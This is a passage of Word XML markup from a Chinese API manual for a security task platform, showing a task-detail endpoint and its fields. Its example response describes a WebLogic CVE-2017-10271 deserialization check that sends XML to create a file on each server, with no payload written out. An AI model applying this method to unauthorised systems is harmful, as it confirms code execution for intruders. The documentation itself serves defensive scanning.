          <w:p w14:paraId="7768E220" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DB7DC3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="673C3C87" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D4F0A9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C573B39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7987BBCA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>总任务数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CEAE289" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="383" w:name="_Toc115166264"/>
      <w:bookmarkStart w:id="384" w:name="获取某一个任务的详细信息"/>
      <w:bookmarkEnd w:id="382"/>
      <w:r>
        <w:t>获取某一个任务的详细信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="383"/>
    </w:p>
    <w:p w14:paraId="2A014CEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/task/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF111EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51491479" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA35752" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/task/0478ee5024763edc6d3c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4459DE2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AD21B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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0478ee5024763edc6d3c"</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Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; 10.3.6 '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>wls-wsat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>XMLDecoder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 反序列化漏洞(CVE-2017-10271)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"category"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"安全检测"</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漏洞描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>WebLogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>的WLS Security组件对外提供webservice服务，其中使用了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>XMLDecoder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>检测过程：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>1.首先获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>的kb,进行遍历，获取其中的servers字段后，再进行一次遍历一遍获取服务器监听的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>和端口信息，将每一个server组合成一个新的数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>遍历每</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>一个server，获取其中的proto(协议类型)、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>、port,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>其中先</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>地址进行处理(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.3.4后为ipv6地址)，然后组合成</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>,并往</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">发送xml数据。根据当前时间戳生成一个文件名，xml数据的作用则是创建该文件。 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3.遍历根据时间戳生成的文件名数组,判断其是否存在。如果文件存在，则上报存在漏洞。否则上报不存在漏洞 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>使用场景：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>可通过该脚本进行快速识别哪些主机上存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>服务然后判断是否存在反序列化漏洞，并将存在漏洞的主机上报。"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>riskInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>漏洞检测结果基于已有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> KB数据进行漏洞存在性判断，若您在是在刚刚修复完成漏洞后进行检测，则需要先更新数据依赖后再执行该检测脚本获取最新漏洞检测结果。"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>createdTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-05-30 09:42:42"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>updatedTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-05-30 09:42:42"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>inputSchemas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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outputSchemas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF33A40"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701"/>
        <w:gridCol w:w="3220"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7084E0E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00EA21C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C6DE590" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F0C938A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B10418B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34B43071" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FB34014" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AAE4816" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>快速任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="360A9414" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29AF4B43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44E7140B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FF8C781" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>快速任务名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="06CD88D2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EDF929D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72087895" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A06ED61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>快速任务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E51ABC2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="160686F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13740DFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66498A76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务概述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="529B46C8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E36F19E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>riskInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CE00074" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="687E5BF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DB3182B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29F75301" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createdTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103819DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53451E95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1AC260B4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AB2DB85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A9C7C78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
